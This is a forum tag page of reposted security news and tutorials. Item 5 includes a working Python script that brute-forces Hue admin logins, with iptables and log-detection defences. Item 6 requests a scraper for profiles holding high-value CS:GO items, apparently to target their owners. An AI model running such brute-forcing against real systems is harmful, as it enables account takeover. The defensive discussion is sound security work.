
Showing results for tags 'data'.

  1. Twitter has seen a surge in government requests for user information, according to its latest transparency report. The social media platform has seen a 40% rise in the number of requests from governments around the world since its last report, in July 2014. Hundreds came from the government of Turkey, which has previously attempted to ban Twitter. The most requests came from the US government. All of the large internet companies, including Google, Facebook and Yahoo, now release regular transparency reports in order to keep users informed about how much data is shared with governments. It is part of the industry's response to revelations from former National Security Agency contractor Edward Snowden, which pointed to mass government surveillance programs in the US and abroad. "Providing this insight is simply the right thing to do, especially in an age of increasing concerns about government surveillance," Twitter senior manager of legal policy Jeremy Kessel said in a blogpost. Twitter received 2,871 requests from governments across the world asking it to reveal data about 7,144 of its users in the second half of 2014. Just over half (52%) of the requests had been fulfilled, it said. Most of the requests came from the US government - with 1,622 requests. 80% of which were complied with. The Turkish government made 356 requests, putting it second place behind the US. None of its data requests had been complied with, said Twitter, although it did not go into details about what they had been about. The company also saw an 84% increase in government demands to remove content from Twitter. The top three requesting countries were: Turkey (477) Russia (91) Germany (43) In Turkey, these requests tended to focus on claimed violations of personal rights either for citizens or government officials. Prime Minister Recep Tayyip Erdogan blocked Twitter in Turkey in March after an anonymous source posted allegations of government corruption. 
The ban was overturned in the courts and the service restored. Russia had sent 108 requests for account information since July, according to Twitter. Previously it had not sent any. It had also sent 91 requests for the removal of content, ranging from posts promoting illegal drugs to attempts to suppress non-violent demonstration. "We denied several requests to silence popular critics of the Russian government and other demands to limit speech about non-violent demonstration in Ukraine," said Mr Kessel. In August, Russia passed laws placing restrictions on users of social media. Bloggers with more than 3,000 daily readers were forced to register with the media regulator, social networks were required to retain six months' worth of data on its users and bloggers were not allowed to remain anonymous. Source
  2. A security consultant has published 10 million passwords along with their corresponding usernames in a move he characterized as both necessary and legally risky given a legal landscape he said increasingly threatens the free flow of hacking-related information. Most of the existing corpus of passwords exposed in hack attacks is stripped of usernames, preventing researchers from studying the possible relationship between the two fields. Mark Burnett, a well-known security consultant who has developed a specialty collecting and researching passwords leaked online, said his sole motivation for releasing the data was to advance what's already known about the way people choose passcodes. At the same time, he said he was worried the list might land him in legal hot water given the recent five-year sentence handed to former Anonymous activist and writer Barrett Brown, in part based on links to hacked authentication data he posted in Internet chat channels. "I think this is completely absurd that I have to write an entire article justifying the release of this data out of fear of prosecution or legal harassment," he wrote in a post published Monday night on his blog. "I had wanted to write an article about the data itself but I will have to do that later because I had to write this lame thing trying to convince the FBI not to raid me." Last March, federal prosecutors dropped criminal charges related to links Brown left in two Internet relay chat channels that were frequented by members of the Anonymous hacker collective. The links led to authentication data taken during the December 2011 hack on Strategic Forecasting by members of Anonymous. Before dropping the charge, prosecutors said the links amounted to the transfer of stolen information. Even though the charge was dropped, however, prosecutors still raised the linking to support their argument Brown deserved a long prison sentence. 
In Monday night's post, Burnett also raised changes the Obama administration is proposing to federal anti-hacking statutes. Many security professionals have said the revised law would outlaw the publication of links to public password dumps even if the person making the link had no intent to defraud. If the people sharing the information have any reason to believe someone might use it to gain unauthorized computer access, critics have argued, they would be subject to stiff legal penalties under the Computer Fraud and Abuse Act. Including usernames alongside passwords could help advance what's known about passwords in important ways. Researchers, for instance, could use the data to determine how often users include all or part of their usernames in their passwords. Besides citing the benefit to researchers, Burnett also defended the move by noting that most of the leaked passwords were "dead," meaning they had been changed already, and that all of the data was already available online. As password dumps go, 10 million is a large number, but it's still small compared to the seminal 2009 hack of gaming website RockYou, which leaked 32 million passcodes, 14.3 million of which were unique. Last year, The New York Times reported that Russian criminals amassed a database of more than one billion passwords gathered from more than 420,000 websites. As Burnett noted, what sets this latest dump apart is that it was made by a security professional with the goal of advancing the public understanding of password choices. Equally noteworthy will be the reaction it receives from prosecutors. Source
  3. Oracle has issued a patch to fix several bugs in its Hyperion Product Management financial consolidation and reporting application that could be remotely exploited by hackers. Oracle's Proactive Support team announced the fixes, confirming that they address a number of flaws in the Hyperion Planning 11.1.2.2.x part of the application. The company does not offer firm details about the patch to non-registered customers, and had not responded to V3's request for further details at the time of publishing. However, TK Keanini, chief technology officer at Lancope, told V3 that the user base and nature of data handled within Hyperion means customers should be concerned by the flaw. "If you are running this software, it contains up-to-date business intelligence that you must keep secure. So if you are running this software it is incredibly important to keep it up to date and patched," he said. "Ask yourself this: if the information in your Hyperion system was compromised and posted to the internet for all to see, would you be OK with that? "The problem most companies face is that they sometimes don't know what is running on their network and this is problem number one that must be solved." Keanini explained that companies should patch the remote access vulnerabilities as soon as possible, but added that he has yet to see any evidence of the flaws being actively exploited by hackers. "This is not just one vulnerability but several. The CVEs that have remote access are the most important to fix first," he said. "I have not [seen the flaws being exploited] but when data is published to the internet, it is not like attackers take the time to show their timeline and the provenance of the data. "This is always interesting data but also a dangerous indicator because it is a lagging indicator at best." The Hyperion patch is one of many critical fixes issued by Oracle this year. 
The firm released a critical update in January addressing 167 vulnerabilities across hundreds of its products, including Java. Source
  4. “Quantum cryptography uses photons and physics to generate cryptographic keys”

What is quantum cryptography?

Quantum cryptography is NOT a new algorithm to encrypt and decrypt data. Rather it is a technique of using photons to generate a cryptographic key and transmit it to a receiver using a suitable communication channel. A cryptographic key plays the most important role in cryptography; it is used to encrypt/decrypt data.

Types of cryptography

There are two types of cryptography:

  • Symmetric Cryptography
  • Asymmetric Cryptography

Symmetric Key Cryptography is also known as Secret Key Cryptography (SKC) where a key (any text, numbers, etc.) is used to encrypt data, and the same key is used to decrypt that data. The smallest change in the secret key will fail to decrypt an encrypted message. For example, text that is encrypted using AES encryption with key Infosec will fail to decrypt another cipher text which was encrypted using key INFOSEC.

Asymmetric Key Cryptography is also known as Public Key Cryptography (PKC) where two sets of keys are generated. One is called a public key and other is called a private key. A public key is used to encrypt data whereas a private key is used to decrypt that data. Similar to symmetric cryptography, the smallest change in any of the two keys will make them useless to get the original data. A benefit of asymmetric cryptography is that you can share the public key with the whole world so that they can use it to send you encrypted data. And the private key is stored safely with the owner and is used for decryption. One disadvantage of this type of cryptography is that if your private key is lost or leaked then you will have to generate a new pair of public and private keys.

Why do we need quantum cryptography?

Every new solution is made because of some problem we have with the current solution. The case is no different with this one. Let us see the problem first.
The problem with symmetric cryptography is that the same key is used to both encrypt and decrypt the messages. If for some reason that key is leaked to some third party, then it can be used to decrypt communication between two trusted devices or persons. In the worst case, the communication can be intercepted and altered. Today’s huge computing power (these days even Xbox and PlayStation at homes have huge power) can be used to crack a key used in symmetric cryptography. Another major problem with this type of cryptography is how to decide which key to use and how to share between trusted devices or persons. Imagine a key has to be shared between India and America, then that communication too has to be secured before sharing the key. Coming to the problem of asymmetric cryptography, it is not something we are facing right now, but seeing the pace of changing technology, we will be facing it soon. Most of the keys used in public key cryptography are at least 128-bit keys which are considered to be very strong. An attacker can easily get hold of the public key because it is shared by the user. But to generate a private key for that public key involves huge amounts of calculations with permutations and combinations. At present a supercomputer is what you need to crack a PKC and many years to complete it. But it will become pretty much possible with the use of quantum computers which use quantum physics to operate and have very high efficiency and computation speed. A quantum computer is a theoretical concept right now and will utilize atoms and molecules to perform computing at a very high speed. According to Moore’s Law, in an integrated circuit the number of transistors doubles every 2 years. It means that the speed of computing will increase to a very high level every two years. Right now Intel i7 processor integrated circuit has 1.4 billion transistors. 
Clearly, in the coming decades computing speed will increase and the age of quantum computers will become a reality. Now from our above discussion it is very clear that the biggest problem with the current cryptographic techniques is keys and their security in transmission.

How does quantum cryptography work?

In quantum cryptography, the source sends a key to the receiver, and this key can be used to decrypt any future messages that are to be sent. When the key has been successfully sent and received, the next step is to send encrypted data to the receiver and let it decrypt and process that data.

Important: the key is the main part of cryptography and should be sent in a very secure manner. Quantum cryptography has a different way of sending the key to the receiver. It uses photons to send a key.

What is a photon, and how it is used?

A photon is the smallest particle of light. It has three types of spins:

  • Horizontal
  • Vertical
  • Diagonal (Right and Left)

A photon has the capability to spin in all three states at the same time.

How do we use it in cryptography?

Another part of physics and photons is polarization. Polarization can be used to polarize (pass through a filter) a photon so that it has a particular spin, vertical or horizontal or diagonal. Polarization of a photon is performed using polarization filters.

Now comes Heisenberg’s Uncertainty Principle, which states that it is impossible to measure together the speed and position of a particle with highest accuracy, and its state will change when measured. In other words, if an eavesdropper intercepts the transmitted photons and passes it through its polarizer, if it is wrong it will make the receiver get the wrong photon. Hence the interception of communication will get detected.

It means that if a photon is polarized using say X filter (Diagonal Polarization), then to get the original spin of the photon only X filter can be used.
If a + filter (Rectilinear Polarization) is used on the photon, then it will either be absorbed by the filter or the polarized photon will be of different spin than the original photon. For example, a horizontal spinning photon when passed through a wrong filter will lead to diagonal spin, which is incorrect.

The below table shows output spin for used polarization:

  • Rectilinear Polarization (+): Horizontal Spin (–), Vertical Spin (|)
  • Diagonal Polarization (X): Left Diagonal Spin (\), Right Diagonal Spin (/)

How to send data using photons

One of the major concerns before using quantum cryptography is how to associate data with photons. This problem can be easily solved by assigning the spin of every photon as 0 or 1. Please see the sample table below:

  • Horizontal Spin (–): 0
  • Vertical Spin (|): 1
  • Left Diagonal Spin (\): 0
  • Right Diagonal Spin (/): 1

Imagine Alice applies polarizations on photons and gets the spin and keeps a note of it. Every spin has a value associated with it. Please refer to the table below:

Do note that Alice is able to find the spin of photon after polarization using four detectors (horizontal, vertical, right diagonal, left diagonal).

Now the key in binary format is: 0101100110101011

This binary data can be converted into other formats like string and integer, depending upon choice of the users involved in the communication. Let us assume Alice wants the key to be in integer format, so the key will be:

In real world implementation, the key should not be this short in length.

How to share and verify the key

In the above section, Alice applied polarization and calculated the value of the key, which will be transmitted to Bob. Note that transmission of these photons takes place in optical fiber cables. Alice sends the polarized photons to Bob using a suitable communication channel.
Bob is listening for incoming photons and randomly applies any polarization (rectilinear or diagonal) and keeps a note of applied polarization, spin and its value.

Now when the transmission has completed, Alice and Bob communicate on a public channel which need not be encrypted. Bob tells Alice only the polarizations (not the spin or value) he applied in the exactly same sequence, and Alice only says YES/NO. This communication will be something like this:

In the above communication, Bob gets to know the wrong polarizations. But do note that we have a problem here which is highlighted in orange color. See that Alice said polarization applied is wrong but the spin Bob received had the same bit value (1) as Alice’s. But Bob has no way to find what value Alice has so he has no other way but to discard his results for wrong polarization.

After successful key transmission and fixing of wrong polarization, encrypted data can be sent and decrypted when received.

Communication interception

If a user is intercepting the communication between sender and receiver, then he will have to randomly apply polarization on the photons sent. After polarization, he will forward it to the original sender. But it is impossible for the eavesdropper to guess all polarizations correctly. So when Bob and Alice validate the polarizations, and Bob fails to decrypt the data, then the interception of communication will get detected.

Conclusion

Privacy and data security is right now of utmost importance to people. With quantum cryptography, secure transmission of data is possible, and chances of it being intercepted and altered are very low. This technology has been implemented in some areas. But is still under deeper research before being widely implemented.

Reference: How Quantum Cryptology Works - HowStuffWorks

Source
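The exchange described in this post, as an added simulation that is not part of the original post or its source article: Alice encodes random bits in randomly chosen polarizations, Bob measures with random filters, and both keep only the positions where the filters matched. The function names, the `eavesdrop` switch and the use of the mismatch rate between the two sifted keys as the interception signal are assumptions of this example.

```python
import random

RECT, DIAG = "+", "x"  # rectilinear and diagonal polarization filters

# Spin symbols and bit values as assigned in the post's tables.
SPIN = {(RECT, 0): "-", (RECT, 1): "|", (DIAG, 0): "\\", (DIAG, 1): "/"}


def spins(bits, bases):
    """Render a bit/filter sequence with the post's spin symbols."""
    return "".join(SPIN[(basis, bit)] for bit, basis in zip(bits, bases))


def measure(bit, prepared_in, measured_in, rng):
    """The matching filter recovers the bit; the wrong filter yields a random one."""
    return bit if prepared_in == measured_in else rng.randint(0, 1)


def run_exchange(n_photons, eavesdrop, seed):
    """Simulate one key exchange and return (alice_key, bob_key) after sifting."""
    rng = random.Random(seed)
    alice_bits = [rng.randint(0, 1) for _ in range(n_photons)]
    alice_bases = [rng.choice((RECT, DIAG)) for _ in range(n_photons)]
    bob_bases = [rng.choice((RECT, DIAG)) for _ in range(n_photons)]

    bob_bits = []
    for bit, a_basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        photon_bit, photon_basis = bit, a_basis
        if eavesdrop:
            # The interceptor must pick a filter at random, and the photon
            # it forwards carries that filter's polarization from then on.
            e_basis = rng.choice((RECT, DIAG))
            photon_bit = measure(photon_bit, photon_basis, e_basis, rng)
            photon_basis = e_basis
        bob_bits.append(measure(photon_bit, photon_basis, b_basis, rng))

    # Public channel: Bob announces only his filters, Alice answers YES/NO.
    # Positions with a NO are discarded by both sides.
    keep = [i for i in range(n_photons) if alice_bases[i] == bob_bases[i]]
    return [alice_bits[i] for i in keep], [bob_bits[i] for i in keep]


def mismatch_rate(alice_key, bob_key):
    """Fraction of sifted positions where the two keys disagree."""
    if not alice_key:
        return 0.0
    return sum(a != b for a, b in zip(alice_key, bob_key)) / len(alice_key)


if __name__ == "__main__":
    for eavesdrop in (False, True):
        a_key, b_key = run_exchange(4000, eavesdrop, seed=1)
        print(f"eavesdrop={eavesdrop}: sifted bits={len(a_key)}, "
              f"mismatch rate={mismatch_rate(a_key, b_key):.3f}")
```

Without interception the sifted keys are identical; with it, roughly one sifted bit in four disagrees, which is the signal Alice and Bob look for.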
  5. The term “Big Data” has been flinging around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the internet of things. These things all will produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was birthed as an open source project from the Google filesystem (GFS), and Map Reduce white-papers; the creator is Doug Cutting and the open source community. Map reduce is the core of Hadoop, and allows the user to write very simple programs to distribute workload across a complex amount of data. The Google filesystem inspired the majority of the work for the open source Hadoop filesystem (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines that can be analyzed using Map reduce programming. That is just a brief dive into what Hadoop is, and if you want to learn more I highly recommend you take a gander at the Yahoo Hadoop tutorial. Here is an ecosystem filled with projects that make managing this complex monster easier on administrators and developers. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives a web interface for the user to query their data using some of these projects that live in this big data ecosystem like:

  • Hive
  • Pig
  • Oozie
  • Impala

Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being — Hue has access to some seriously valuable information. As with most technologies, security is often an after-thought. 
It is important we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell the same information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason that I have picked Hue as an example of a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Let’s crack some Hue accounts! Of course in this article I’m using a Virtual Machine and not testing on live systems in the wild. That would be highly unethical…but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks — much like children stories about being good or the boogie man will get you. So, I decided to test the limits and see how easy it would be to crack into a Hue account using old school methods of brute-forcing. As a standard bad practice people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account?

```
~$ ./hute.py
.... .... .... .... .... .... .... .... .... .... ....
Success! admin:admin
Completed attack at 2014-09-30 16:19:55.113608
```

Here is the source code for those who care and would like to test their own systems using the same methods in this proof of concept.
```python
#!/usr/bin/python
import sys
import requests
import datetime
from fake_useragent import UserAgent

## CONFIG STARTS HERE ##
user = "admin"
host = "hostname:port"
listfile = "~/dictionaries/top1000-worst-passwords.txt"
## CONFIG ENDS HERE##

dictionary = open(listfile)
list = dictionary.readlines()
words = [ ]
print "Initializing dictionary",
for entry in list:
    print('.'),
    newword = entry.rstrip("\n")
    words.append(newword)
print "Now testing "
for password in words:
    ua = UserAgent().random
    headers = { "User-Agent" : ua }
    post = { "username" : user, "password" : password }
    r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
    invalid = r.text.find("Invalid")
    if invalid == -1:
        print "\nSuccess! " + user + ":" + password
        print "Completed test at ",
        print datetime.datetime.now()
        sys.exit()
    else:
        print "...."
print "Attack unsuccessful...Completed at ",
print datetime.datetime.now()
```

What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two factor auth within django. What we can do is protect Hue with some iptables magic. We can use iptables’ recent module to keep an eye out for shady traffic and to act on that traffic:

```
~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP
~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set
```

Above when we have more than 10 immediate hits we will drop the incoming traffic for 30 seconds, thus thwarting any effective bruteforce attempt. It is not foolproof, but definitely going to put a dent in most bruteforce attacks on Hue. The point of this article is to not shame Hue by any means, but to shine light on security in this emerging space. Unfortunately the issue of bruteforce is an age old concern. 
The developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle this around all we want, but only a few lines of code to save the user from hanging themselves — which is the job of the developer. These security lessons have been learned time and time again. Source
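An added example, not part of the original post or of Hue: the same 10-hits-in-30-seconds threshold as the iptables rules above, applied as detection over web access logs. It counts login POSTs per source address because the script above sends a different User-Agent on every request; the log format, addresses and agent strings are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(seconds=30)    # mirrors --seconds 30
THRESHOLD = 10                    # mirrors --hitcount 10
LOGIN_PATH = "/accounts/login/"   # login endpoint used by the script in the post

# Assumed combined-log-style line; adjust to the real proxy or server format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse(line):
    """Return (ip, timestamp, method, path without query, user agent) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], m["ua"]


def detect(lines):
    """Flag sources with THRESHOLD or more login POSTs inside WINDOW."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    agents = defaultdict(set)     # ip -> distinct User-Agent strings seen
    alerts = {}
    for line in lines:
        record = parse(line)
        if record is None:
            continue
        ip, ts, method, path, ua = record
        if method != "POST" or path != LOGIN_PATH:
            continue
        window = recent[ip]
        window.append(ts)
        while ts - window[0] > WINDOW:
            window.popleft()
        agents[ip].add(ua)
        if len(window) >= THRESHOLD:
            alert = alerts.setdefault(ip, {"first_alert": ts, "peak": 0})
            alert["peak"] = max(alert["peak"], len(window))
    for ip, alert in alerts.items():
        # Many agents from one address is itself a sign of scripted traffic.
        alert["user_agents"] = len(agents[ip])
    return alerts


def sample_log():
    """Constructed log: one ordinary login and one burst of 12 login POSTs."""
    base = datetime(2014, 9, 30, 16, 19, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, status, ua):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return (f'{ip} - - [{ts}] "{method} {LOGIN_PATH}?next=/ HTTP/1.1" '
                f'{status} 512 "-" "{ua}"')

    lines = [
        line("198.51.100.20", 0, "GET", 200, "ExampleBrowser/1.0"),
        line("198.51.100.20", 4, "POST", 302, "ExampleBrowser/1.0"),
    ]
    for i in range(12):
        lines.append(line("203.0.113.7", 10 + i, "POST", 200, f"RandomAgent/{i}"))
    return lines


if __name__ == "__main__":
    for ip, alert in detect(sample_log()).items():
        print(ip, alert["first_alert"].isoformat(), alert["peak"], alert["user_agents"])
```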
  6. Hi, I need a small program that:

  • fetches Steam profiles from csgolounge.com
  • calculates the value of the items in the CSGO inventory (APPid = 730)
  • if the value of the items is greater than a variable that I set and the Steam level is within a range that I specify, saves the link to the inventory in a file
  • if the link is already there, skips it

Output file format (I used the separator "||", it does not matter, it can be any separator that makes sense there). START DATE AND TIME and END DATE AND TIME are the moments when I start searching and when I finish searching (close the program), respectively.

----- START DATE AND TIME -------
URL_To_Profile_1 || Inventory_Value || Steam_Level
URL_To_Profile_2 || Inventory_Value || Steam_Level
URL_To_Profile_3 || Inventory_Value || Steam_Level
------ END DATE AND TIME -------

I don't really care what language the program is written in, and I don't need a GUI; what matters is that it does its job properly. And here is another aspect. I want the program to be as optimized as possible, meaning multithreaded. It is no use to me if it finds one profile every 2 hours. Anyone who thinks they can do this project relatively quickly should contact me. I need such a program within a week. I am offering $100 in BTC. Of course, we will use a moderator to do escrow. I am on the forum often, so I will reply quickly to private messages. Thank you.
  7. As Ars has previously reported, documents passed to journalists by former National Security Agency contractor Edward Snowden have shown that the NSA and its British counterpart agency, the GCHQ, have exploited privacy "leaks" in mobile applications (including Rovio's Angry Birds) to track individuals of interest. A new document recently published by Der Spiegel provides further details on just how much the GCHQ was able to extract from mobile data to keep tabs on those it targeted for surveillance. The British agency used a program referred to as BADASS to suck up data emitted from Angry Birds and other apps, and the information was so granular, analysts could even track how well (or poorly) a person was doing playing. BADASS is an acronym for "BEGAL Automated Deployment And Survey System," and the system pulled in data from GCHQ and NSA network taps identified as mobile analytics and advertising traffic. Among other things, this data included Google "pref" cookies (such as those used by Ars to identify users in our own passive network surveillance testing with NPR) and Flurry application analytic data used by developers to track usage and performance of their mobile apps. User location data and activity could also be monitored based on the data stream, allowing analysts to pinpoint an active user within minutes, according to the GCHQ presentation from 2011. Much of this data was easily tracked because the mobile apps did not encrypt data in transit, leaving data exposed to anyone who might be able to monitor the network. That's still the case for many of these analytics and advertising services. Source
  8. Cyber attacks targeting government institutions, companies and international organizations have increased in recent years. Malware is the weapon of choice. For seven years, G DATA has tracked the activity of one of the best-known malware programs: Agent.BTZ. In 2008, the malware strain was involved in a cyber attack on the Pentagon in the United States. In 2014, it was found that the Uroburos spyware program had attacked both the Belgian and the Finnish Ministries of Foreign Affairs. In November 2014, ComRAT (the successor of Agent.BTZ) was discovered and analyzed in detail, revealing technical similarities with the Uroburos rootkit. In all the malware samples analyzed, G DATA experts found similar program code. How do the authors proceed to achieve the concept of cyber espionage? To illustrate how an extremely complex spyware program is developed, the security experts closely investigated Agent.BTZ and ComRAT – in total, 46 different samples were analyzed over a period of seven years. “As a result of the analysis, we now have data on seven years of development of the malware, which was used by a group of criminals in attacks aimed at extremely sensitive targets, such as the US Pentagon in 2008, and the Belgian Ministry of Foreign Affairs and the Finnish Ministry of Foreign Affairs in 2014”, explains Ralf Benzmuller, head of G Data SecurityLabs.

Minor software changes

Up to version 3.00, in 2012, the G Data security experts detect only minor changes to the software. Changes were made for Windows versions, programming errors were removed and camouflaged attack methods were added. The biggest update took place in version 3.00 of the ComRAT malware. Nevertheless, the attackers' methods are not very clear. The security experts suspect that behind the malware are well-trained hackers who know how to cover their tracks.
The G Data analysts are certain that the group behind Uroburos, Agent.BTZ and ComRAT continues to be active in malware attacks and in the APT (Advanced Persistent Threat) area. The latest revelations and certain links lead to speculation that more attacks can be expected in the future.

The detailed analysis of the complex spyware program is described at: https://blog.gdatasoftware.com/blog/article/evolution-of-sophisticated-spyware-from-agentbtz-to-comrat.html

G Data experts analyzed the successor of Agent.BTZ, ComRAT: https://blog.gdatasoftware.com/blog/article/the-uroburos-case-new-sophisticated-rat-identified.html

COM object hijacking is examined in detail on the G DATA SecurityBlog: https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html

The Uroburos analysis can be found on the G DATA SecurityBlog (https://blog.gdatasoftware.com/blog/article/uroburos-highly-complex-espionage-software-with-russian-roots.html), together with a detailed technical analysis of the malware's functionality (https://blog.gdatasoftware.com/blog/article/uroburos-deeper-travel-into-kernel-protection-mitigation.html).

-> Source <-
  9. Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information. Argus is composed of an advanced comprehensive network flow data generator, the Argus sensor, which processes packets (either capture files or live packet data) and generates detailed network flow status reports of all the flows in the packet stream. Argus captures much of the packet dynamics and semantics of each flow, with a great deal of data reduction, so you can store, process, inspect and analyze large amounts of network data efficiently. Argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission, and delay metrics for all network flows, and captures most attributes that are available from the packet contents, such as L2 addresses, tunnel identifiers (MPLS, GRE, ESP, etc…), protocol ids, SAP’s, hop-count, options, L4 transport identification (RTP, RTCP detection), host flow control indications, etc. Argus is used by many sites to generate network activity reports for every network transaction on their networks. The network audit data that Argus generates is great for security, operations and performance management. The data is used for network forensics, non-repudiation, network asset and service inventory, behavioral baselining of server and client relationships, detecting covert channels, and analyzing Zero day events. 
Argus is an Open Source project, currently running on Mac OS X, Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows (under Cygwin) and OpenWrt, and has been ported to many hardware accelerated platforms, such as Bivio, Pluribus, Arista, and Tilera. The software should be portable to many other environments with little or no modifications. Performance is such that auditing an entire enterprise’s Internet activity can be accomplished using modest computing resources. Download: ARGUS- Auditing Network Activity - Getting Argus
  10. Obama’s proposed hacking law could unwittingly make you a criminal Next week, Obama is expected to unveil an update to the US’ CFAA law against hacking in a State of the Union address, hot on the tail of Sony’s massive hacking attack that unfolded in late 2014. A draft version of the new law has been published on the White House website and gives us a look into a scary future in which clicking a single link could make you complicit in committing a hacking crime. A letter accompanying the proposal dated January 13 introduces the new law to Congress for discussion. Remember when Sony wanted to sue Twitter (and individual users) who posted screenshots or links to its stolen data? According to Errata Security, these new laws could pin you as a “racketeer” who willingly participated in hacking if you were one of those users (or if you clicked one of those links); punishable by up to 10 years in jail. Didn’t click a link? There are plenty of other ways you could be in legal trouble; Errata points out that something as trivial as being in an IRC channel where others are discussing a hack or having an online conversation with a “hacker” could make you a member of a “criminal enterprise,” which would allow the FBI to confiscate all your electronics. The piece of legislation also could cover data like email address and password dumps that might be found on services like Pastebin. If you accessed one of those knowingly, you could be punishable for the complete hacking offense under the draft legislation. This is to say, that if you accessed a data leak from inside a company that was shared online by another party, the language in the updated proposal says that you would now be punishable to the same extent as those who performed the hacking themselves. That’s up to 20 years in prison, along with other potential penalties. The proposed legislation is also worrisome for those in the penetration testing industry. 
I talked with Dan Tentler, a prominent computer security researcher on Twitter, who is worried that his job itself could become legally sketchy. Dan Tentler @vIss so the whitehouse thinks that by disarming the good guys, it'll stop bad guys. Good job, fellas. *slow clap* Obama’s proposal — which is expected to be made next week — has a few major hurdles to make it into actual law, but it’s cause for concern that even a draft is so broad about the definition of hacking itself and who can be held accountable for it. Tentler expressed concerns that the definition of “protected computer” is so vague that it could be stretched to almost anything. Is a “protected computer” one that is wide open to the internet with minimal security? Or does simply having a basic firewall enabled imply protection? The Washington Post expressed similar concerns, citing that it’s hard to define when a computer is protected if information is available online, without hindrance. The wording could make almost anyone who found themselves stumbling over data they shouldn’t — let alone those that make a living searching for and reporting security flaws — liable for a crime they didn’t commit. Errata Security also pointed out in its blog that “most hacking is international and anonymous” and says the government “can’t catch the perpetrators no matter how much they criminalize the activities.” He believes that instead, “while Obama’s new laws will dramatically increase hacking prosecutions, they’ll be of largely innocent people rather than the real hackers that matter.” The story of Weev’s imprisonment in 2013 for accessing and sharing data that wasn’t properly protected shows how vague laws can be a problem in a world where companies often aren’t being held responsible for customer data. Since it’s still early days for the law, it’s hard to say what the implications truly could be, but if it’s as broad as it appears, it could put people in danger unwittingly. 
Cyber security legislation is important in the wake of the Sony hack, but this doesn’t appear to be the right way to go about it. Obama's Proposed Hacking Law Could Make You a Criminal
  11. Name: SSebastian.Net Founder: Sava Sebastian-Florin (me) Category: Blog Total posts: Blog Total members: Blog Description: Personal blog of Sava Sebastian-Florin. Site: SSebastian.Net - Blog personal Sava Sebastian-Florin
  12. The number of subpoenas, total orders and warrants that the United States government delivered to Verizon all dropped in the second half of 2014, according to the company’s latest transparency report. The giant telecom provider released data on Thursday that showed a decrease in subpoenas of about 10 percent from the first half of last year to the second half. The volume of pen register and trap and trace orders fell by a little less than 10 percent, and the number of warrants served on Verizon by law enforcement also dropped from 14,977 to 13,050. Verizon officials said in the report that the company received between 0-999 National Security Letters during the second half of 2014, the same range it reported for the first half of the year. The government only allows companies to report the number of NSLs they receive in bands of 1,000. The volume of wiretap orders that Verizon receives remained virtually unchanged from 2013 to 2014, falling slightly from 1,496 in all of 2013 to 1,433. In addition to releasing the data on government orders, Verizon officials also said that the company has been working on privacy issues throughout the past year. “While much of our work to protect our customers’ privacy is done behind the scenes, in the past year we took public positions on issues of significance to our customers. We’ve opposed the United States government’s position that it could issue a search warrant to obtain customer emails stored in a Microsoft server in Ireland. We have a particular interest in this issue as we provide cloud computing and data storage services to business customers around the world, including many non-U.S. customers in data centers outside the United States,” said Craig Silliman, executive vice president and general counsel. “Although Verizon has not received any warrants from the U.S. 
government for our customers’ information stored in our overseas data centers, we filed briefs in courts and worked with Senators on a bill (The LEADS Act) to help defeat this overreach by the U.S. government. We also continue to support legislation that will add privacy protections to the Foreign Intelligence Surveillance Act (FISA) statute, including ending bulk collection of communications data.” In terms of secret orders from the Foreign Intelligence Surveillance Court, Verizon said it received between 0-999 FISA orders in the first half of 2014. Those orders targeted between 3,000-3,999 customer selectors, meaning that Verizon definitely received some non-zero number of FISA orders. The government makes companies wait six months before reporting FISA data, so the numbers from the first half of last year are the most recent information Verizon can publish. Source
